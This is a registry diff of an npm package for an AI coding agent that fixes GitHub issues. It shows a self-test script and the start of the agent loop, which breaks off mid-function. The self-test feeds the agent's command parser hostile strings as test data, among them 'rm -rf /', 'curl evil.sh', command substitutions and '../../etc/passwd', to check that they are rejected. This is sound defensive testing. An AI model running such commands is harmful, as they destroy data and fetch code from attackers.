@aarushpandey/gitagent 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (36) hide show
  1. package/CONTRIBUTING.md +104 -0
  2. package/LICENSE +21 -0
  3. package/README.md +570 -0
  4. package/TESTING.md +290 -0
  5. package/action.yml +113 -0
  6. package/examples/README.md +124 -0
  7. package/examples/sample-audit-trail-issue-4.md +112 -0
  8. package/examples/sample-review-tqec-pr894-v1-raw-flawed.md +71 -0
  9. package/examples/sample-review-tqec-pr894-v2-raw.md +48 -0
  10. package/examples/sample-review-tqec-pr894-v3-curated.md +118 -0
  11. package/examples/verify-marker-precedence/README.md +97 -0
  12. package/examples/verify-marker-precedence/conftest.py +15 -0
  13. package/examples/verify-marker-precedence/pyproject.toml +8 -0
  14. package/examples/verify-marker-precedence/test_marker_precedence.py +56 -0
  15. package/examples/verify-marker-precedence/verify_precedence.py +67 -0
  16. package/examples/workflows/issue-fix.yml +32 -0
  17. package/examples/workflows/pr-review.yml +34 -0
  18. package/package.json +75 -0
  19. package/scripts/verify.js +478 -0
  20. package/src/agents/agentLoop.js +176 -0
  21. package/src/agents/engineeringAgent.js +51 -0
  22. package/src/agents/reviewCopilot.js +79 -0
  23. package/src/agents/tools.js +486 -0
  24. package/src/cli/output.js +137 -0
  25. package/src/config.js +22 -0
  26. package/src/mapper/fileRelevance.js +113 -0
  27. package/src/mapper/repoMap.js +105 -0
  28. package/src/orchestrator.js +336 -0
  29. package/src/pipeline.js +985 -0
  30. package/src/prompts/engineering.js +189 -0
  31. package/src/prompts/review.js +149 -0
  32. package/src/utils/cost.js +47 -0
  33. package/src/utils/diffLines.js +67 -0
  34. package/src/utils/githubUrl.js +8 -0
  35. package/src/web/public/index.html +128 -0
  36. package/src/web/server.js +51 -0
@@ -0,0 +1,478 @@
1
+ #!/usr/bin/env node
2
+ // End-to-end live verification of every shipped feature.
3
+ // No Anthropic API calls, no GitHub access — just exercises every code path
4
+ // against synthetic temp directories so you can see the real behavior.
5
+
6
+ const fs = require('fs');
7
+ const os = require('os');
8
+ const path = require('path');
9
+
10
+ const ROOT = path.resolve(__dirname, '..');
11
+ process.chdir(ROOT);
12
+
13
+ const C = {
14
+ reset: '\x1b[0m', dim: '\x1b[2m', bold: '\x1b[1m',
15
+ green: '\x1b[32m', red: '\x1b[31m', yellow: '\x1b[33m',
16
+ blue: '\x1b[34m', cyan: '\x1b[36m', magenta: '\x1b[35m'
17
+ };
18
+ let passes = 0, fails = 0;
19
+
20
+ function section(title) {
21
+ console.log(`\n${C.bold}${C.cyan}━━ ${title} ━━${C.reset}`);
22
+ }
23
+ function pass(msg) {
24
+ passes++;
25
+ console.log(`${C.green} ✓${C.reset} ${msg}`);
26
+ }
27
+ function fail(msg, detail) {
28
+ fails++;
29
+ console.log(`${C.red} ✗ ${msg}${C.reset}${detail ? `\n ${detail}` : ''}`);
30
+ }
31
+ function info(msg) {
32
+ console.log(`${C.dim} ${msg}${C.reset}`);
33
+ }
34
+ function check(label, ok, detail) {
35
+ if (ok) pass(label); else fail(label, detail);
36
+ }
37
+
38
+ function mkTmp(prefix = 'verify-') {
39
+ return fs.mkdtempSync(path.join(os.tmpdir(), prefix));
40
+ }
41
+ function rm(dir) {
42
+ try { fs.rmSync(dir, { recursive: true, force: true }); } catch {}
43
+ }
44
+
45
+ // ---------------------------------------------------------------------------
46
+ async function main() {
47
+ // ──────────────────────────────────────────────────────────────────────
48
+ section('1. Module exports — pipeline can be required without auto-running');
49
+ const pipeline = require('../src/pipeline');
50
+ check('exports.buildAuditTrail is a function', typeof pipeline.buildAuditTrail === 'function');
51
+ check('exports.buildPrBody is a function', typeof pipeline.buildPrBody === 'function');
52
+ check('exports.runIssue is a function', typeof pipeline.runIssue === 'function');
53
+
54
+ // ──────────────────────────────────────────────────────────────────────
55
+ section('2. Path traversal — safeJoin blocks escape attempts');
56
+ const { safeJoin, parseTestCommand, parseLintCommand, dispatchTool } = require('../src/agents/tools');
57
+ const tmpRepo = mkTmp('repo-');
58
+ fs.writeFileSync(path.join(tmpRepo, 'inside.txt'), 'ok');
59
+ check('inside-repo path resolves',
60
+ safeJoin(tmpRepo, 'inside.txt') === path.resolve(tmpRepo, 'inside.txt'));
61
+ let threw = false;
62
+ try { safeJoin(tmpRepo, '../../etc/passwd'); } catch { threw = true; }
63
+ check('../../etc/passwd is rejected', threw);
64
+ threw = false;
65
+ try { safeJoin(tmpRepo, '/etc/passwd'); } catch { threw = true; }
66
+ check('/etc/passwd is rejected', threw);
67
+
68
+ // ──────────────────────────────────────────────────────────────────────
69
+ section('3. Shell injection — parseTestCommand / parseLintCommand');
70
+ for (const dangerous of ['npm test; rm -rf /', 'npm test && curl evil.sh', 'npm test `whoami`', 'npm test $(id)']) {
71
+ const r = parseTestCommand(dangerous);
72
+ check(`rejects: ${dangerous}`, r.error && /metacharacter/.test(r.error));
73
+ }
74
+ check('accepts: npm run test -- --watchAll=false',
75
+ !parseTestCommand('npm run test -- --watchAll=false').error);
76
+ check('accepts: pytest tests/ -v',
77
+ !parseTestCommand('pytest tests/ -v').error);
78
+ check('accepts: tox',
79
+ !parseTestCommand('tox').error);
80
+ check('accepts: nox',
81
+ !parseTestCommand('nox').error);
82
+ check('accepts: make test',
83
+ !parseTestCommand('make test').error);
84
+ check('lint: ruff check . accepted',
85
+ !parseLintCommand('ruff check .').error);
86
+ check('lint: black --check . accepted',
87
+ !parseLintCommand('black --check .').error);
88
+ check('lint: mypy . accepted',
89
+ !parseLintCommand('mypy .').error);
90
+ check('lint: eslint . accepted',
91
+ !parseLintCommand('eslint .').error);
92
+ check('lint: rm -rf / rejected',
93
+ /allowlist/.test(parseLintCommand('rm -rf /').error || ''));
94
+
95
+ // ──────────────────────────────────────────────────────────────────────
96
+ section('4. write_file overwrite safety');
97
+ fs.writeFileSync(path.join(tmpRepo, 'existing.js'), 'old');
98
+ let r = await dispatchTool('write_file',
99
+ { path: 'existing.js', content: 'NEW' },
100
+ { repoPath: tmpRepo });
101
+ check('refuses to overwrite without overwrite:true', !r.ok && /already exists/.test(r.error));
102
+ r = await dispatchTool('write_file',
103
+ { path: 'existing.js', content: 'NEW', overwrite: true },
104
+ { repoPath: tmpRepo });
105
+ check('overwrites when overwrite:true is passed', r.ok && r.overwrote === true);
106
+ r = await dispatchTool('write_file',
107
+ { path: 'newfile.js', content: 'hi' },
108
+ { repoPath: tmpRepo });
109
+ check('creates new files without overwrite flag', r.ok && r.overwrote === false);
110
+
111
+ // ──────────────────────────────────────────────────────────────────────
112
+ section('5. apply_patch fallback strategies');
113
+ // Exact match
114
+ fs.writeFileSync(path.join(tmpRepo, 'p1.js'), 'const x = 1;\n');
115
+ r = await dispatchTool('apply_patch',
116
+ { path: 'p1.js', old_string: 'const x = 1;', new_string: 'const x = 42;' },
117
+ { repoPath: tmpRepo });
118
+ check('exact match patches', r.ok && /exact match/.test(r.message));
119
+
120
+ // Whitespace-normalized: file uses tabs, agent sends spaces
121
+ fs.writeFileSync(path.join(tmpRepo, 'p2.py'), 'def foo():\n\treturn\t\t1\n');
122
+ r = await dispatchTool('apply_patch',
123
+ { path: 'p2.py', old_string: 'def foo():\n return 1', new_string: 'def foo():\n return 2' },
124
+ { repoPath: tmpRepo });
125
+ check('whitespace-normalized fallback succeeds on tabs-vs-spaces drift',
126
+ r.ok && /whitespace-normalized/.test(r.message));
127
+ info(`patched file now: ${JSON.stringify(fs.readFileSync(path.join(tmpRepo, 'p2.py'), 'utf8'))}`);
128
+
129
+ // Closest-line hint on miss
130
+ fs.writeFileSync(path.join(tmpRepo, 'p3.js'),
131
+ 'const a = 1;\nconst actually_relevant_thing = 3;\nconst b = 2;\n');
132
+ r = await dispatchTool('apply_patch',
133
+ { path: 'p3.js', old_string: 'const totally_not_there = 3;', new_string: 'X' },
134
+ { repoPath: tmpRepo });
135
+ check('miss returns descriptive error', !r.ok && /not found/.test(r.error));
136
+
137
+ // ──────────────────────────────────────────────────────────────────────
138
+ section('6. apply_patch_range — line-based edits');
139
+ fs.writeFileSync(path.join(tmpRepo, 'lines.txt'), 'A\nB\nC\nD\n');
140
+ r = await dispatchTool('apply_patch_range',
141
+ { path: 'lines.txt', start_line: 2, end_line: 3, new_content: 'X\nY\nZ' },
142
+ { repoPath: tmpRepo });
143
+ const after = fs.readFileSync(path.join(tmpRepo, 'lines.txt'), 'utf8');
144
+ check('replaces lines 2..3 correctly', r.ok && after === 'A\nX\nY\nZ\nD\n');
145
+ info(`file now: ${JSON.stringify(after)}`);
146
+ r = await dispatchTool('apply_patch_range',
147
+ { path: 'lines.txt', start_line: 1, end_line: 99, new_content: 'X' },
148
+ { repoPath: tmpRepo });
149
+ check('rejects out-of-range line numbers', !r.ok && /Invalid range/.test(r.error));
150
+
151
+ // ──────────────────────────────────────────────────────────────────────
152
+ section('7. give_up tool — graceful escape hatch');
153
+ r = await dispatchTool('give_up', {
154
+ reason: 'too_complex',
155
+ explanation: 'Would need changes across 8 files including a C extension.',
156
+ blockers: ['no test environment', 'unfamiliar Cython internals']
157
+ }, { repoPath: tmpRepo });
158
+ check('returns gave_up:true with structured reason',
159
+ r.ok && r.gave_up === true && r.reason === 'too_complex');
160
+ check('preserves explanation', r.explanation.includes('8 files'));
161
+ check('preserves blockers list', Array.isArray(r.blockers) && r.blockers.length === 2);
162
+ info(`reason: ${r.reason} · blockers: ${r.blockers.length}`);
163
+
164
+ // ──────────────────────────────────────────────────────────────────────
165
+ section('8. find_relevant_files — keyword scorer');
166
+ const ranked = await dispatchTool('find_relevant_files',
167
+ { query: 'login email uppercase bug', top_k: 5 },
168
+ { repoPath: tmpRepo });
169
+ // tmpRepo doesn't have login files, so ranked will be empty — that's fine
170
+ check('returns ok with candidates array', ranked.ok && Array.isArray(ranked.candidates));
171
+
172
+ // Now with a more realistic repo
173
+ const relRepo = mkTmp('rel-');
174
+ fs.mkdirSync(path.join(relRepo, 'src', 'auth'), { recursive: true });
175
+ fs.writeFileSync(path.join(relRepo, 'src', 'auth', 'login.py'),
176
+ 'def login(email, password):\n return email.lower()\n');
177
+ fs.writeFileSync(path.join(relRepo, 'src', 'app.py'),
178
+ 'from .auth.login import login\n');
179
+ fs.writeFileSync(path.join(relRepo, 'src', 'unrelated.py'),
180
+ 'def compute_fft():\n pass\n');
181
+ const ranked2 = await dispatchTool('find_relevant_files',
182
+ { query: 'Login fails when email is uppercase', top_k: 3 },
183
+ { repoPath: relRepo });
184
+ check('ranks login.py first for an issue about login + email',
185
+ ranked2.ok && ranked2.candidates[0] &&
186
+ ranked2.candidates[0].path === 'src/auth/login.py');
187
+ info(`top-3: ${ranked2.candidates.map(c => `${c.path}(${c.score})`).join(', ')}`);
188
+ rm(relRepo);
189
+
190
+ // ──────────────────────────────────────────────────────────────────────
191
+ section('9. Big-project file walker — extensions, ignore-dirs, truncation');
192
+ const { buildRepoMap } = require('../src/mapper/repoMap');
193
+ const bigRepo = mkTmp('big-');
194
+ fs.mkdirSync(path.join(bigRepo, 'src'), { recursive: true });
195
+ for (const ext of ['py', 'pyx', 'pxd', 'pyi', 'rs', 'go', 'java', 'toml', 'md', 'rst']) {
196
+ fs.writeFileSync(path.join(bigRepo, 'src', `f.${ext}`), '// stub');
197
+ }
198
+ fs.writeFileSync(path.join(bigRepo, 'Makefile'), 'test:\n\tpytest\n');
199
+ fs.writeFileSync(path.join(bigRepo, 'tox.ini'), '[tox]');
200
+ // big-project artefact dirs that must be ignored
201
+ for (const ignored of ['node_modules', 'target', 'vendor', '.mypy_cache', '.pytest_cache', '.tox', '_build', 'site']) {
202
+ fs.mkdirSync(path.join(bigRepo, ignored));
203
+ fs.writeFileSync(path.join(bigRepo, ignored, 'junk.py'), 'noise');
204
+ }
205
+ const walked = buildRepoMap(bigRepo);
206
+ check('walks .pyx', walked.files.includes('src/f.pyx'));
207
+ check('walks .pxd', walked.files.includes('src/f.pxd'));
208
+ check('walks .pyi', walked.files.includes('src/f.pyi'));
209
+ check('walks .rs', walked.files.includes('src/f.rs'));
210
+ check('walks .toml/.md/.rst (config + docs)',
211
+ walked.files.includes('src/f.toml') &&
212
+ walked.files.includes('src/f.md') &&
213
+ walked.files.includes('src/f.rst'));
214
+ check('recognises Makefile', walked.files.includes('Makefile'));
215
+ check('recognises tox.ini', walked.files.includes('tox.ini'));
216
+ check('skips node_modules/target/vendor/.mypy_cache/.pytest_cache/.tox/_build/site',
217
+ !walked.files.some(f => /node_modules|target|vendor|mypy_cache|pytest_cache|\.tox|_build|site/.test(f)));
218
+ info(`walked ${walked.total} files; truncated=${walked.truncated}`);
219
+
220
+ // truncation
221
+ for (let i = 0; i < 50; i++) fs.writeFileSync(path.join(bigRepo, `extra-${i}.py`), '');
222
+ const small = buildRepoMap(bigRepo, { maxFiles: 5 });
223
+ check('truncated:true with cap',
224
+ small.truncated && small.cap === 5 && small.files.length === 5);
225
+ info(`returned ${small.files.length} of ${small.total} (truncated=${small.truncated})`);
226
+ rm(bigRepo);
227
+
228
+ // ──────────────────────────────────────────────────────────────────────
229
+ section('10. Test command detection — Makefile/tox/nox/npm/pytest/etc.');
230
+ const {
231
+ detectTestCommand, detectLintCommands,
232
+ detectSubPackages, guessSubPackageForIssue,
233
+ readContributionGuidelines,
234
+ extractVerdict
235
+ } = require('../src/orchestrator');
236
+
237
+ const cases = [
238
+ { setup: { 'Makefile': 'test:\n\tpytest\n' }, expect: 'make test' },
239
+ { setup: { 'tox.ini': '[tox]', 'pyproject.toml': '[tool.pytest]' }, expect: 'tox' },
240
+ { setup: { 'noxfile.py': 'import nox', 'pyproject.toml': '[tool.pytest]' }, expect: 'nox' },
241
+ { setup: { 'package.json': '{"scripts":{"test":"jest"}}' }, expect: 'npm test' },
242
+ { setup: { 'pyproject.toml': '[tool.pytest]' }, expect: 'pytest' },
243
+ { setup: { 'go.mod': 'module x' }, expect: 'go test ./...' },
244
+ { setup: { 'Cargo.toml': '[package]' }, expect: 'cargo test' },
245
+ { setup: {}, expect: 'npm test' /* fallback */ },
246
+ ];
247
+ for (const c of cases) {
248
+ const t = mkTmp('det-');
249
+ for (const [name, content] of Object.entries(c.setup)) {
250
+ fs.writeFileSync(path.join(t, name), content);
251
+ }
252
+ const got = detectTestCommand(t);
253
+ check(`${JSON.stringify(c.setup)} → ${c.expect}`, got === c.expect, `got: ${got}`);
254
+ rm(t);
255
+ }
256
+
257
+ // ──────────────────────────────────────────────────────────────────────
258
+ section('11. Lint command detection — ruff/black/mypy/eslint');
259
+ const lintCases = [
260
+ { setup: { 'pyproject.toml': '[tool.ruff]\n[tool.black]\n[tool.mypy]\n' },
261
+ expects: ['ruff check .', 'black --check .', 'mypy .'] },
262
+ { setup: { '.eslintrc.json': '{}', '.prettierrc': '{}' },
263
+ expects: ['eslint .', 'prettier --check .'] },
264
+ { setup: {}, expects: [] }
265
+ ];
266
+ for (const c of lintCases) {
267
+ const t = mkTmp('lint-');
268
+ for (const [name, content] of Object.entries(c.setup)) {
269
+ fs.writeFileSync(path.join(t, name), content);
270
+ }
271
+ const got = detectLintCommands(t);
272
+ const allFound = c.expects.every(e => got.includes(e));
273
+ check(`${JSON.stringify(c.setup)} → ${JSON.stringify(c.expects)}`,
274
+ got.length === c.expects.length && allFound, `got: ${JSON.stringify(got)}`);
275
+ rm(t);
276
+ }
277
+
278
+ // ──────────────────────────────────────────────────────────────────────
279
+ section('12. Monorepo subpackage detection (Qiskit-style)');
280
+ const mono = mkTmp('mono-');
281
+ for (const sub of ['qiskit-terra', 'qiskit-aer', 'qiskit-ibmq']) {
282
+ fs.mkdirSync(path.join(mono, sub));
283
+ fs.writeFileSync(path.join(mono, sub, 'pyproject.toml'), '[project]');
284
+ }
285
+ const subs = detectSubPackages(mono);
286
+ check('detects all 3 subpackages', subs.length === 3);
287
+ check('classified as python', subs.every(s => s.kind === 'python'));
288
+ info(`subs: ${subs.map(s => s.name).join(', ')}`);
289
+ const guess = guessSubPackageForIssue(subs, 'Transpiler in terra breaks empty circuits');
290
+ check('guesses qiskit-terra for a terra-flavored issue',
291
+ guess && guess.name === 'qiskit-terra');
292
+ info(`guessed: ${guess && guess.name}`);
293
+ const noGuess = guessSubPackageForIssue(subs, 'completely unrelated text');
294
+ check('returns null when nothing matches', noGuess === null);
295
+ rm(mono);
296
+
297
+ // ──────────────────────────────────────────────────────────────────────
298
+ section('13. CONTRIBUTING.md / PR template / DCO detection');
299
+ const contribRepo = mkTmp('cg-');
300
+ fs.writeFileSync(path.join(contribRepo, 'CONTRIBUTING.md'),
301
+ 'All contributions must be Signed-off-by per the Developer Certificate of Origin.');
302
+ fs.mkdirSync(path.join(contribRepo, '.github'));
303
+ fs.writeFileSync(path.join(contribRepo, '.github', 'PULL_REQUEST_TEMPLATE.md'),
304
+ '## Checklist\n- [ ] Tests added\n- [ ] Docs updated');
305
+ const cg = readContributionGuidelines(contribRepo);
306
+ check('reads CONTRIBUTING.md', cg.contributing && cg.contributing.path === 'CONTRIBUTING.md');
307
+ check('reads PR template', cg.prTemplate && /Checklist/.test(cg.prTemplate.text));
308
+ check('detects DCO from CONTRIBUTING text', cg.requiresDco === true);
309
+ rm(contribRepo);
310
+
311
+ // DCO from .github/dco.yml
312
+ const dcoRepo = mkTmp('dco-');
313
+ fs.mkdirSync(path.join(dcoRepo, '.github'));
314
+ fs.writeFileSync(path.join(dcoRepo, '.github', 'dco.yml'), 'require: true');
315
+ check('detects DCO from .github/dco.yml',
316
+ readContributionGuidelines(dcoRepo).requiresDco === true);
317
+ rm(dcoRepo);
318
+
319
+ // ──────────────────────────────────────────────────────────────────────
320
+ section('14. Verdict extraction');
321
+ check('APPROVE → APPROVE', extractVerdict('## Verdict\n**APPROVE**\n') === 'APPROVE');
322
+ check('REQUEST_CHANGES → REQUEST_CHANGES',
323
+ extractVerdict('Final: REQUEST_CHANGES — see notes.') === 'REQUEST_CHANGES');
324
+ check('NEEDS_DISCUSSION → NEEDS_DISCUSSION',
325
+ extractVerdict('verdict: NEEDS_DISCUSSION') === 'NEEDS_DISCUSSION');
326
+ check('unparseable → UNKNOWN', extractVerdict('idk lol') === 'UNKNOWN');
327
+
328
+ // ──────────────────────────────────────────────────────────────────────
329
+ section('15. Cost math — input/output/cache_read/cache_creation');
330
+ const { computeCost } = require('../src/utils/cost');
331
+ const { COST_INPUT_PER_MTOK, COST_OUTPUT_PER_MTOK,
332
+ COST_CACHE_READ_PER_MTOK, COST_CACHE_CREATION_PER_MTOK } = require('../src/config');
333
+ info(`config: $${COST_INPUT_PER_MTOK}/in $${COST_OUTPUT_PER_MTOK}/out $${COST_CACHE_READ_PER_MTOK}/cache-read $${COST_CACHE_CREATION_PER_MTOK}/cache-create`);
334
+ const cost = computeCost({
335
+ input_tokens: 1_000_000, output_tokens: 1_000_000,
336
+ cache_read_input_tokens: 1_000_000, cache_creation_input_tokens: 1_000_000
337
+ });
338
+ const expected = COST_INPUT_PER_MTOK + COST_OUTPUT_PER_MTOK + COST_CACHE_READ_PER_MTOK + COST_CACHE_CREATION_PER_MTOK;
339
+ check(`computeCost includes cache_creation (${cost.total_usd.toFixed(4)} == ${expected.toFixed(4)})`,
340
+ Math.abs(cost.total_usd - expected) < 0.001);
341
+
342
+ // ──────────────────────────────────────────────────────────────────────
343
+ section('16. Audit trail — human-readable rendering');
344
+ const { buildAuditTrail, buildPrBody } = pipeline;
345
+ const fakeIssue = { number: 42, title: 'fix login', html_url: 'https://github.com/x/y/issues/42' };
346
+ const fakeUsage = {
347
+ input_tokens: 100, output_tokens: 50,
348
+ cache_read_input_tokens: 0, cache_creation_input_tokens: 0
349
+ };
350
+ const fakeEng = {
351
+ history: [
352
+ { turn: 1, kind: 'thought', text: 'Looking at auth module' },
353
+ { turn: 1, kind: 'tool', name: 'read_file', input: { path: 'src/auth/login.js' }, result: { ok: true } },
354
+ { turn: 2, kind: 'tool', name: 'apply_patch', input: { path: 'src/auth/login.js' }, result: { ok: true } },
355
+ { turn: 3, kind: 'tool', name: 'run_tests', input: { command: 'npm test' }, result: { ok: true, passed: true, attempts: 1 } },
356
+ { turn: 4, kind: 'tool', name: 'run_lint', input: { command: 'eslint .' }, result: { ok: true, passed: true } }
357
+ ],
358
+ finalSummary: 'Lowercased email before lookup.',
359
+ sawPassingTests: true, sawPassingLint: true,
360
+ completedTurns: 5, gaveUp: null
361
+ };
362
+ const audit = buildAuditTrail({
363
+ issue: fakeIssue, branch: 'fix/issue-42',
364
+ engineering: fakeEng, review: '## Verdict\n**APPROVE**\n',
365
+ revision: null, totalUsage: fakeUsage, preFixSha: 'abc1234'
366
+ });
367
+ check('audit has Outcome section with FINISHED', /## Outcome\s+\n+✅ \*\*Finished\*\*/.test(audit));
368
+ check('audit has Safety gates section', /## Safety gates/.test(audit));
369
+ check('audit lists Tests observed passing: YES', /Tests observed passing: \*\*YES\*\*/.test(audit));
370
+ check('audit lists Lint observed passing: YES', /Lint observed passing: \*\*YES\*\*/.test(audit));
371
+ check('audit has Files touched section', /## Files touched/.test(audit) && /src\/auth\/login\.js/.test(audit));
372
+ check('audit has Test runs section with counts', /## Test runs/.test(audit) && /Total invocations: 1/.test(audit));
373
+ check('audit has Timeline (condensed)', /## Timeline \(condensed\)/.test(audit));
374
+ check('audit has Full transcript collapsed in <details>', /<details>/.test(audit) && /## Full tool transcript/.test(audit));
375
+ check('audit shows pre-fix SHA + revert command', /abc1234/.test(audit) && /git reset --hard abc1234/.test(audit));
376
+
377
+ // GAVE UP variant
378
+ const gaveUpEng = {
379
+ ...fakeEng, finalSummary: null, sawPassingTests: false, sawPassingLint: null,
380
+ gaveUp: { reason: 'too_complex', explanation: 'Would need 8 files changed.', blockers: ['no test env'] }
381
+ };
382
+ const audit2 = buildAuditTrail({
383
+ issue: fakeIssue, branch: 'fix/issue-42',
384
+ engineering: gaveUpEng, review: null, revision: null,
385
+ totalUsage: fakeUsage, preFixSha: 'abc1234'
386
+ });
387
+ check('audit renders ❌ Gave up with reason', /❌ \*\*Gave up\*\* — `too_complex`/.test(audit2));
388
+ check('audit lists blockers when given up', /- no test env/.test(audit2));
389
+
390
+ // ──────────────────────────────────────────────────────────────────────
391
+ section('17. PR body — Resolves + summary + review block + template');
392
+ const body = buildPrBody({
393
+ issue: fakeIssue, engineering: fakeEng,
394
+ review: '## Verdict\n**APPROVE**\nLooks good.',
395
+ revision: null
396
+ });
397
+ check('PR body contains "Resolves #42"', /Resolves #42/.test(body));
398
+ check('PR body contains the engineering summary', /Lowercased email/.test(body));
399
+ check('PR body collapses review in <details>', /<details><summary>Click to expand<\/summary>/.test(body));
400
+
401
+ const bodyWithTemplate = buildPrBody({
402
+ issue: fakeIssue, engineering: fakeEng,
403
+ review: '## Verdict\n**APPROVE**\n',
404
+ revision: null,
405
+ prTemplate: { path: '.github/PULL_REQUEST_TEMPLATE.md', text: '## Checklist\n- [ ] Tests added' }
406
+ });
407
+ check('PR template appears at top when provided',
408
+ bodyWithTemplate.indexOf('## Checklist') < bodyWithTemplate.indexOf('Resolves #42'));
409
+
410
+ // ──────────────────────────────────────────────────────────────────────
411
+ section('18. CLI — usage prints when invoked with no args');
412
+ const { execSync } = require('child_process');
413
+ let helpOut = '';
414
+ try {
415
+ helpOut = execSync('node src/pipeline.js', { encoding: 'utf8' });
416
+ } catch (e) {
417
+ // process.exit(1) when no args — that's intentional, capture stdout
418
+ helpOut = (e.stdout || '') + (e.stderr || '');
419
+ }
420
+ check('usage shows issue/review/triage subcommands',
421
+ /Usage:/.test(helpOut) && /issue/.test(helpOut) && /review/.test(helpOut) && /triage/.test(helpOut));
422
+ check('usage lists --fork / --comment / --post / --force-pr / --web / --max-cost',
423
+ /--fork/.test(helpOut) && /--comment/.test(helpOut) && /--post/.test(helpOut) &&
424
+ /--force-pr/.test(helpOut) && /--web/.test(helpOut) && /--max-cost/.test(helpOut));
425
+
426
+ // ──────────────────────────────────────────────────────────────────────
427
+ section('19. Web dashboard — server starts + serves /events');
428
+ const { createDashboard } = require('../src/web/server');
429
+ const dash = createDashboard();
430
+ const server = await dash.start(0); // 0 = random free port
431
+ const port = server.address().port;
432
+ info(`dashboard listening on port ${port}`);
433
+ // Push an event before connecting — buffer should replay it.
434
+ dash.pushEvent({ stage: 'verify_test', message: 'hello from verify.js' });
435
+ // Hit /events with a quick HTTP request and check the SSE format.
436
+ const http = require('http');
437
+ await new Promise((resolve) => {
438
+ const req = http.get(`http://127.0.0.1:${port}/events`, (res) => {
439
+ check('GET /events returns 200', res.statusCode === 200);
440
+ check('Content-Type is text/event-stream',
441
+ /text\/event-stream/.test(res.headers['content-type'] || ''));
442
+ let received = '';
443
+ res.on('data', (chunk) => {
444
+ received += chunk.toString('utf8');
445
+ if (received.includes('verify_test')) {
446
+ check('SSE replays buffered events to new subscriber', true);
447
+ req.destroy();
448
+ resolve();
449
+ }
450
+ });
451
+ setTimeout(() => {
452
+ if (!received.includes('verify_test')) {
453
+ check('SSE replays buffered events to new subscriber', false, 'no event received in 1s');
454
+ }
455
+ req.destroy();
456
+ resolve();
457
+ }, 1000);
458
+ });
459
+ req.on('error', () => {
460
+ check('SSE connection succeeds', false);
461
+ resolve();
462
+ });
463
+ });
464
+ server.close();
465
+
466
+ // ──────────────────────────────────────────────────────────────────────
467
+ rm(tmpRepo);
468
+
469
+ console.log(`\n${C.bold}━━ Summary ━━${C.reset}`);
470
+ console.log(`${C.green} passed: ${passes}${C.reset}`);
471
+ console.log(` failed: ${fails === 0 ? C.green : C.red}${fails}${C.reset}`);
472
+ if (fails > 0) process.exit(1);
473
+ }
474
+
475
+ main().catch(e => {
476
+ console.error(`${C.red}verify.js crashed:${C.reset}`, e);
477
+ process.exit(2);
478
+ });
@@ -0,0 +1,176 @@
1
+ const Anthropic = require('@anthropic-ai/sdk');
2
+ const { TOOLS, dispatchTool } = require('./tools');
3
+ const { MODEL, MAX_AGENT_ITERATIONS, MAX_TURN_OUTPUT_TOKENS } = require('../config');
4
+ const { emptyUsage, addUsage, computeCost } = require('../utils/cost');
5
+
6
+ function previewInput(input) {
7
+ const json = JSON.stringify(input);
8
+ if (json.length <= 140) return json;
9
+ return json.slice(0, 137) + '...';
10
+ }
11
+
12
+ const RETRYABLE_NETWORK_CODES = new Set([
13
+ 'ECONNRESET', 'ETIMEDOUT', 'EAI_AGAIN', 'ECONNREFUSED', 'ENETUNREACH', 'EPIPE'
14
+ ]);
15
+
16
+ function isRetryable(err) {
17
+ if (!err) return false;
18
+ const status = err.status || (err.response && err.response.status);
19
+ if (status === 429 || status === 529) return true;
20
+ if (status >= 500 && status < 600) return true;
21
+ const code = err.code || (err.cause && err.cause.code);
22
+ if (code && RETRYABLE_NETWORK_CODES.has(code)) return true;
23
+ return false;
24
+ }
25
+
26
+ async function callWithRetry(fn, {
27
+ maxAttempts = 3,
28
+ baseDelayMs = 1000,
29
+ onRetry = () => {}
30
+ } = {}) {
31
+ let lastErr = null;
32
+ for (let attempt = 1; attempt <= maxAttempts; attempt++) {
33
+ try {
34
+ return await fn();
35
+ } catch (e) {
36
+ lastErr = e;
37
+ if (attempt === maxAttempts || !isRetryable(e)) throw e;
38
+ const delay = baseDelayMs * Math.pow(2, attempt - 1);
39
+ onRetry({ attempt, nextAttempt: attempt + 1, delayMs: delay, error: e });
40
+ await new Promise(r => setTimeout(r, delay));
41
+ }
42
+ }
43
+ throw lastErr;
44
+ }
45
+
46
+ async function runAgentLoop({
47
+ systemPrompt,
48
+ userPrompt,
49
+ ctx,
50
+ maxIterations = MAX_AGENT_ITERATIONS,
51
+ maxTokens = MAX_TURN_OUTPUT_TOKENS,
52
+ costLimitUsd = null,
53
+ onEvent = () => {},
54
+ retryBaseDelayMs = 1000
55
+ }) {
56
+ const client = new Anthropic();
57
+ const messages = [{ role: 'user', content: userPrompt }];
58
+ const usage = emptyUsage();
59
+ const history = [];
60
+ let finalSummary = null;
61
+ let stopReason = null;
62
+ let turn = 0;
63
+ let aborted = null;
64
+ let sawPassingTests = false; // flipped true when run_tests returns passed:true
65
+ let sawPassingLint = null; // null=not run, true=passed, false=last run failed
66
+ let gaveUp = null; // set when agent calls give_up
67
+
68
+ for (turn = 1; turn <= maxIterations; turn++) {
69
+ onEvent({ type: 'turn_start', turn });
70
+
71
+ const response = await callWithRetry(
72
+ () => client.messages.create({
73
+ model: MODEL,
74
+ max_tokens: maxTokens,
75
+ tools: TOOLS,
76
+ system: [{ type: 'text', text: systemPrompt, cache_control: { type: 'ephemeral' } }],
77
+ messages
78
+ }),
79
+ {
80
+ maxAttempts: 3,
81
+ baseDelayMs: retryBaseDelayMs,
82
+ onRetry: (info) => onEvent({ type: 'api_retry', turn, ...info })
83
+ }
84
+ );
85
+
86
+ addUsage(usage, response.usage || {});
87
+ stopReason = response.stop_reason;
88
+
89
+ if (costLimitUsd !== null) {
90
+ const { total_usd } = computeCost(usage);
91
+ if (total_usd > costLimitUsd) {
92
+ onEvent({ type: 'cost_limit_hit', turn, costUsd: total_usd, limit: costLimitUsd });
93
+ aborted = 'cost_limit';
94
+ stopReason = 'cost_limit';
95
+ break;
96
+ }
97
+ }
98
+
99
+ const textBlocks = response.content.filter(b => b.type === 'text').map(b => b.text).join('\n').trim();
100
+ const toolCalls = response.content.filter(b => b.type === 'tool_use');
101
+
102
+ if (textBlocks) {
103
+ onEvent({ type: 'thought', turn, text: textBlocks });
104
+ history.push({ turn, kind: 'thought', text: textBlocks });
105
+ }
106
+
107
+ messages.push({ role: 'assistant', content: response.content });
108
+
109
+ if (toolCalls.length === 0) {
110
+ onEvent({ type: 'no_tools', turn, stop_reason: stopReason });
111
+ break;
112
+ }
113
+
114
+ const toolResults = [];
115
+ for (const call of toolCalls) {
116
